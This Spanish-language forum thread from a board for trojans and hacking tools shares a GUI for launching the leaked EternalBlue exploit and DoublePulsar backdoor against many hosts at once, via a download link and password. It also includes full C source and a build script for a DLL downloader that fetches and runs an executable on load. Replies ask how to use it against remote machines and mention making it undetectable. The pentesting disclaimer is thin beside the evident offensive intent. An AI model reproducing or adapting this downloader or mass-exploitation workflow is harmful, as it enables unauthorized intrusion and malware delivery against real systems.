Hola a todos,
hace unos días que hay un revuelo por el ransomware WannaCry que infectó a montones de organizaciones, empresas, etc, utilizando los exploits y backdoors de la NSA filtrados por el grupo The Shadow Brokers. Desde entonces muchos investigadores han hecho un enorme trabajo analizando dichas herramientas con la finalidad de acabar con esta amenaza. Otros analistas han realizado labores de ingenieria inversa para que los pentesters puedan aprovecharse de estos exploits (como [Enlace externo eliminado para invitados] con su [Enlace externo eliminado para invitados]). También la empresa ElevenPaths hicieron un buen trabajo realizando un [Enlace externo eliminado para invitados], aunque según mi opinión, tuvieron un fallo que explicaré a continuación.

Desde el ataque de WannaCry se han realidado muchos análisis detallados y varias entradas en blogs pero hay algo que no han tenido en cuenta la mayoría de los técnicos y es que, tanto EternalBlue como DoublePulsar (el exploit y backdoor usados) tienen soporte por command line que permite pasarle un archivo de configuración por lo que se podrían ejecutar con muchos hosts simultáneamente.
Imagen

Imagen

(Ambas herramientas comparten el argumento --InFile <archivo de configuración>)

Ayer decidí aportar mi granito de arena y me dispuse a hacer una GUI sencilla para poder utilizar estas herramientas con unos simples clicks.
Imagen

Imagen


NOTA: como se ve en el GIF, el ataque es prácticamente inmediato pero, si no me equivoco, EternalBlue tiene un delay de unos 10 segundos para comprobar que el ataque se ha realizado correctamente.

A continuación os dejo el enlace del archivo comprimido con la herramienta (se requiere .NET 2.0 ya que está hecha con C#) y una carpeta llamada bin donde se encuentran los binarios de EternalBlue y DoublePulsar.

[Enlace externo eliminado para invitados]
Contraseña: BlauIndetectables

No me hago responsable del uso que le deis a la herramienta, está pensada para ayudar a los pentesters. Podéis decompilar la GUI (no está ofuscada) aunque es bastante sencilla, cualquiera puede hacer algo así (tardé unas pocas horas en hacerla).

EDIT:
Un usuario me ha pedido el código fuente, os lo dejo aquí:
[Enlace externo eliminado para invitados]

.
A petición de un compañero por el grupo de Skype, os dejo el código para un downloader DLL en C. Debéis instalar [Enlace externo eliminado para invitados] (o cualquier compilador basado en MinGW).

Downloader.c
#include <windows.h>
BOOL __cdecl __declspec(dllexport) Download() {
	char* szUrl = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe";
	char* szPath = "aaaaa.exe";
	
	char *szTempPath = malloc(256);
	DWORD dwPathLength = GetTempPathA(256, szTempPath);
	
	strncat(szTempPath, szPath, dwPathLength);
	szTempPath[dwPathLength + strlen(szPath) + 1] = 0;

	HRESULT hRes = URLDownloadToFileA(NULL, szUrl, szTempPath, 0, NULL); 
	if(hRes == S_OK) {
		ShellExecuteA(NULL, "open", szTempPath, NULL, NULL, SW_SHOW);
	}
	
    return TRUE;
} 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if(fdwReason != DLL_PROCESS_ATTACH) return TRUE;
    return Download();
} 
Para compilar normalmente me hago un archivo .bat con esta estructura:
@ECHO OFF
SET InputFile=Downloader
SET Parameters=-w -Os -s -fpermissive -shared -lurlmon

del %InputFile%32.dll										
gcc %InputFile%.c %Parameters% -m32 -o %InputFile%32.dll	

del %InputFile%64.dll										
gcc %InputFile%.c %Parameters% -m64 -o %InputFile%64.dll
Impoluto como siempre compañero, eres una maquina. :drinking:

PD: Aquí podemos ver lo que pasa cuando una entidad quiere tener todo el poder sin tener la capacidad de controlarlo, gracias a los leaks ya sabemos donde son capaces de llegar.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Que gran herramienta, tenia una duda. He probado en red local y me ha funcionado de lujo, luego me conecte al router del vecino (legalmente claro) y mi otro pc le abri el puerto 445, le mande dll y salta el mensaje de DONE!! pero dentro sale Fail. Solo funciona en red local o como va exactamente?
Muy bueno blau :clap: :clap: :clap: sos un maestro :drinking: Lo probe en local y funciona perfecto ahora una pregunta... Como se podria utilizar con los remotos? para poder ejecutar en maquinas que esten en LAN :g:
¡Gracias a todos! Ayer The Shadow Brokers dijeron que en junio quizá sacarían más exploits para Windows 10, smartphones, etc, si lo hacen actualizaré la herramienta.
kakarudo123 escribió: 17 May 2017, 03:26 Muy bueno blau :clap: :clap: :clap: sos un maestro :drinking: Lo probe en local y funciona perfecto ahora una pregunta... Como se podria utilizar con los remotos? para poder ejecutar en maquinas que esten en LAN :g:
Haría falta reprogramar la herramienta. Algún día que tenga libre lo puedo hacer aunque puedo asegurar que no será FUD (hará falta droppear los exploits).
Blau escribió: 17 May 2017, 17:45 ¡Gracias a todos! Ayer The Shadow Brokers dijeron que en junio quizá sacarían más exploits para Windows 10, smartphones, etc, si lo hacen actualizaré la herramienta.
kakarudo123 escribió: 17 May 2017, 03:26 Muy bueno blau :clap: :clap: :clap: sos un maestro :drinking: Lo probe en local y funciona perfecto ahora una pregunta... Como se podria utilizar con los remotos? para poder ejecutar en maquinas que esten en LAN :g:
Haría falta reprogramar la herramienta. Algún día que tenga libre lo puedo hacer aunque puedo asegurar que no será FUD (hará falta droppear los exploits).
Que buenisimo que estaria si lo pudieras hacer blau !!! :drinking:
Responder

Volver a “Troyanos y Herramientas”